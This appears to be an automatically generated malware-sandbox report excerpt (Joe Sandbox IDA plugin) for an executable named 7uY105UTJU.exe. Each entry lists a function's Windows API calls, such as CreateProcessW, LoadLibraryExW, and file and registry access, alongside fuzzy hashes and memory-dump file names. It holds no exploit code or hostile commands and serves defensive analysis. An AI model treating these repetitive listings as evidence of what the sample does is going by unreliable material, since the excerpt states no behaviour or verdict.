Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
Instruction ID: 5ff066b55785a601c9e0ac29068a23864f952070569c454aea33db173c3c2586
Opcode Fuzzy Hash: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
Instruction Fuzzy Hash: 29E09A369082048FE705EBA4AE494AEB3B4EB80325B200A7FE001F11C0CBB84C00966C

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abbina",?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?, abbina",?), ref: 00405B70

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Function 00401578 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0040158C
ShowWindow.USER32(?), ref: 004015A1

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
Instruction ID: ac0fea7dd280022ba88880c6e2ee8458450bfb5d79ff8b32edbe1086f76aca9f
Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
Instruction Fuzzy Hash: 02E04F32B10114ABCB15DFA8FED08ADB3B6EB48320310143FD102B3690C775AD449B18

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\7uY105UTJU.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764

Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
Opcode Fuzzy Hash: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D

Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C

Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173294469.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173406182.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7uY105UTJU.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502

Memory Dump Source

Source File: 00000000.00000002.2173266507.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2173253191.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173281024.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
